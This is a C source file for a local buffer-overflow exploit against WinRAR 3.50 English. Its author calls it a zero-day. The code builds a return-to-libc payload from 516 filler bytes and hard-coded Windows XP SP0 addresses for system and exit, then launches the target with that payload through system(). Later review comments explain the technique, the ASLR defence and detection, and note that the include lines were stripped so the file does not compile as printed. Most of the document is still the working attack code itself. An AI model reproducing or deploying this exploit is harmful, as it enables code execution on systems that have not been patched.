/* local exploit for winrar <= 3.50 ENG version bug is 0day :) i'm used ret-2-func technique. */
/*
 * NOTE(review): the three #include directives below lost their header
 * names during extraction (the angle-bracketed file names were stripped).
 * The calls used in main() are printf/sprintf (stdio.h), exit/system
 * (stdlib.h) and memset/strlen (string.h); as printed, this file does not
 * preprocess. Also as printed, the whole listing was collapsed onto one
 * line, so the `//` comment after sys_addr would have swallowed the rest
 * of the program; the layout below restores the obvious original layout
 * without changing any token.
 */
#include
#include
#include
/*
 * Builds one long command-line argument (516 filler bytes followed by
 * three 4-byte values) and passes it, via system(), to the program named
 * in argv[1]. Everything about the payload is fixed at compile time; the
 * only runtime input is argv[1].
 *
 * argv[1]  path of the program to launch (never length-checked, see the
 *          sprintf() note below).
 * Returns  nothing explicitly; C99 treats falling off the end of main()
 *          as returning 0. exit(0) is used for the usage path.
 */
int main ( int argc, char *argv[] )
{
    /*
     * Hard-coded library addresses. Per the author's comment they are for
     * one specific Windows XP SP0 build; the variable names suggest the
     * addresses of system(), exit() and a command-string pointer, but the
     * code itself only shows them being copied into the payload. Because
     * they are constants, any address-space layout randomisation or a
     * different library build makes the payload inert - this is exactly
     * the class of hard-coded return-to-library chain that ASLR exists to
     * break.
     */
    long sys_addr = 0x77C18044; // winxp sp0 targets...
    long exit_addr = 0x77C27ADC;
    long cmd_addr = 0x77C01335;
    char buf[3000]; /* payload argument; 3000 bytes is far more than the 528 actually used */
    char cmd[3000]; /* full command line handed to system() */
    if ( argc < 2 )
    {
        /* NOTE(review): the usage text probably had an angle-bracketed
         * placeholder after "0xletzdance.exe" that extraction removed. */
        printf("\n * 0xLeTzDanCe - WinRAR <= 3.50 local exploit ENG version *\n * * usage: 0xletzdance.exe \n\n");
        exit(0);
    }
    memset(buf, 0x00, 3000);
    memset(cmd, 0x00, 3000);
    /* 516 bytes of 0x55 filler; the rest of buf stays zero so buf is a
     * NUL-terminated string after this call. */
    memset(buf, 0x55, 516);
    /*
     * Append the three values back-to-back at the current end of the
     * string. Each write lands at strlen(buf), so the chain only stays
     * contiguous if no byte of the previously written value is 0x00 (the
     * three constants above contain no zero byte). The `*(long *)` store
     * is a type-pun that assumes a 4-byte long (32-bit build) and an
     * unaligned-tolerant target; memcpy() would be the portable way to
     * write it.
     */
    *(long*)&buf[strlen(buf)] = sys_addr;
    *(long *)&buf[strlen(buf)] = exit_addr;
    *(long *)&buf[strlen(buf)] = cmd_addr;
    /*
     * NOTE(review): argv[1] is copied unbounded. buf contributes 528 bytes
     * plus the separating space and terminator, so an argv[1] longer than
     * roughly 2470 bytes overflows the harness's own cmd[] buffer.
     * snprintf(cmd, sizeof cmd, ...) with a truncation check would close
     * that self-inflicted hole.
     */
    sprintf(cmd, "%s %s", argv[1], buf);
    /* Launches argv[1] through the shell with the payload as its single
     * argument; the return value of system() is not checked. From a
     * detection standpoint, a process started with a ~530-byte argument
     * made of a single repeated byte is the observable artefact. */
    system(cmd);
}